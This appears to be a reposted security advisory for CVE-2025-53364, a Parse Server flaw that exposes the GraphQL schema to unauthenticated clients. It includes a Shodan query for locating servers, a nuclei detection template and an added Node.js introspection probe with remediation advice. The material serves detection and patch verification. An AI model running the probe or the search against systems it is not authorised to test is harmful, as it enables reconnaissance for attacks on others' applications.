Parse Server GraphQL Schema Information Disclosure Vulnerability

Vulnerability Information

Vulnerability name: Parse Server GraphQL Schema Information Disclosure Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-53364

Vulnerability type: Information disclosure

Severity: Medium

Vulnerability description: Parse Server is an open-source backend framework that supports multiple platforms and is widely used to build backends for mobile and web applications. It exposes a GraphQL API that developers use to query and manipulate data. The vulnerability lies in this GraphQL API: unauthenticated clients can read the GraphQL schema, which discloses the application's structure and potentially sensitive details. The root cause is that GraphQL schema introspection is not subject to access control, so an attacker obtains the schema metadata without a session token or the master key. The disclosed schema (class names, fields, queries and mutations) lets an attacker map the application and look for further weaknesses, so it expands the attack surface. The issue itself does not lead directly to remote code execution or data tampering, but it supplies valuable reconnaissance for follow-on attacks and raises the overall risk. The recommended fix is to disable GraphQL schema introspection in production environments, or to enforce proper authentication for schema access.

Vendor: parseplatform

Product: parse-server

Affected versions: * (the template does not narrow the range; consult the GHSA advisory GHSA-48q3-prgv-gm4w referenced below for the fixed release)

Search syntax (Shodan): http.title:"Parse Server" || "parse-server"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/8315c04dc3f06dd06e06140766b1d61b8525eac0/http%2Fcves%2F2025%2FCVE-2025-53364.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details (nuclei template from the source above)


id: CVE-2025-53364

info:
  name: Parse Server - GraphQL Schema Information Disclosure
  author: securitytaters
  severity: medium
  description: |
    Parse Server contains a GraphQL schema information disclosure vulnerability. The GraphQL API allows public access to the schema without requiring a session token or the master key, potentially exposing metadata that could expand the attack surface.
  impact: |
    An attacker can retrieve GraphQL schema metadata without authentication, potentially revealing application structure and expanding the attack surface for subsequent attacks.
  remediation: |
    Disable GraphQL schema introspection in production environments or implement proper authentication controls for schema access.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-53364
    cwe-id: CWE-200
    cpe: cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: parseplatform
    product: parse-server
    shodan-query: 'http.title:"Parse Server" || "parse-server"'
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53364
    - https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
    - https://parseplatform.org
  tags: cve,cve2025,parse,parseplatform,graphql,info-disclosure

http:
  - method: POST
    path:
      - "{{BaseURL}}/graphql"

    headers:
      X-Parse-Application-Id: test
      Content-Type: application/json
    body: '{"query":"{\n __schema {\n types {\n name\n }\n }\n}"}'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data":{"__schema":{"types":[{"name":"Upload"},'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
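The description above says the schema leaks because introspection has no access control, and the template above checks for that by matching a fixed byte prefix of the JSON reply. The following Node 18+ script is an added example, not code from the page, the nuclei template or the Parse Server project: it sends the same introspection query with the same headers, then evaluates the template's three matcher conditions on the parsed JSON instead of on a raw prefix, and separates GraphQL's built-in types from the application-specific ones that actually constitute the disclosure. The base URL and application id are placeholders you supply; the template probes with the placeholder id "test", so pass the real application id as the second argument if a target refuses the placeholder before concluding it is unaffected. The sample replies in the block are constructed for offline use, not captured from a real server.

```javascript
// Added example (not from the page, the nuclei template, or Parse Server):
// a Node 18+ probe for CVE-2025-53364 that sends the template's introspection
// query and reports which non-built-in types the server disclosed.
// Usage: node probe.js https://parse.example.com/parse [applicationId]
// (URL and application id are placeholders; with no URL the samples run).

const INTROSPECTION_QUERY = '{ __schema { types { name } } }';

// GraphQL's own built-in types appear in every schema and reveal nothing
// about the application; any other type name is application structure.
// Assumption: this is the GraphQL spec's built-in set, not a Parse-specific list.
const BUILTIN_TYPES = new Set([
  'String', 'Int', 'Float', 'Boolean', 'ID',
  '__Schema', '__Type', '__TypeKind', '__Field', '__InputValue',
  '__EnumValue', '__Directive', '__DirectiveLocation',
]);

// Same request the template sends: POST <base>/graphql with the
// X-Parse-Application-Id header (placeholder "test" unless overridden).
function buildProbe(baseUrl, appId = 'test') {
  return {
    url: `${baseUrl.replace(/\/+$/, '')}/graphql`,
    options: {
      method: 'POST',
      headers: {
        'X-Parse-Application-Id': appId,
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ query: INTROSPECTION_QUERY }),
    },
  };
}

// The template's three matchers (HTTP 200, JSON content-type, schema types in
// the body), evaluated on parsed JSON so key order or whitespace cannot cause a
// false negative; a GraphQL "errors" array is treated as a refusal.
function classifyResponse({ status, contentType, bodyText }) {
  if (status !== 200) return { disclosed: false, reason: `HTTP ${status}` };
  if (!/application\/json/i.test(contentType || '')) {
    return { disclosed: false, reason: 'non-JSON response' };
  }
  let body;
  try {
    body = JSON.parse(bodyText);
  } catch {
    return { disclosed: false, reason: 'unparseable body' };
  }
  if (Array.isArray(body.errors) && body.errors.length > 0) {
    return { disclosed: false, reason: body.errors.map(e => e.message).join('; ') };
  }
  const types = body?.data?.__schema?.types;
  if (!Array.isArray(types) || types.length === 0) {
    return { disclosed: false, reason: 'no __schema in response' };
  }
  const exposed = types.map(t => t.name).filter(n => !BUILTIN_TYPES.has(n));
  return { disclosed: true, reason: `${types.length} types returned`, exposed };
}

async function probe(baseUrl, appId) {
  const { url, options } = buildProbe(baseUrl, appId);
  const res = await fetch(url, options);
  return classifyResponse({
    status: res.status,
    contentType: res.headers.get('content-type'),
    bodyText: await res.text(),
  });
}

// Constructed sample replies (not captured from a real Parse Server) so the
// classifier can be exercised offline.
const SAMPLE_RESPONSES = {
  leaking: {
    status: 200,
    contentType: 'application/json; charset=utf-8',
    bodyText: JSON.stringify({ data: { __schema: { types: [
      { name: 'Upload' }, { name: 'String' }, { name: 'Query' },
      { name: 'Viewer' }, { name: '__Schema' }, { name: 'Invoice' },
    ] } } }),
  },
  refused: {
    status: 200,
    contentType: 'application/json',
    bodyText: JSON.stringify({ errors: [{ message: 'unauthorized' }] }),
  },
  notGraphql: { status: 404, contentType: 'text/html', bodyText: '<html>Not Found</html>' },
};

function runSamples() {
  return Object.fromEntries(
    Object.entries(SAMPLE_RESPONSES).map(([k, r]) => [k, classifyResponse(r)]),
  );
}

if (/^https?:\/\//.test(process.argv[2] || '')) {
  probe(process.argv[2], process.argv[3])
    .then(r => console.log(JSON.stringify(r, null, 2)))
    .catch(e => { console.error(e.message); process.exit(2); });
} else {
  console.log(JSON.stringify(runSamples(), null, 2));
}
```

A positive result lists the exposed type names; in the constructed leaking sample those are Upload, Query, Viewer and Invoice, which is the kind of application map the description warns about. After applying a fix, re-run the probe: the expected outcome is either a non-200 status, or a JSON reply whose errors array refuses the introspection query, both of which the classifier reports as not disclosed.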



http://example.com/2025/07/23/github_1146975275/
Author: lianccc
Published: July 23, 2025